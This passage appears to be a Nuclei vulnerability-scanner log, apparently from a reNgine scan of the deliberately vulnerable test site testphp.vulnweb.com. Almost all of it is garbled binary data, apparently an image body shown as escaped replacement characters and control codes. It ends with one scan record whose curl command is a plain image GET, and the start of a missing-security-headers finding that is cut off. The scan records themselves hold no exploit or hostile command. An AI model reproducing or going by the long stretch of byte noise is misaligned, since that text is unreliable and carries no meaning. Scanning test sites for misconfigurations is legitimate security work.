\\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:26.257165073Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 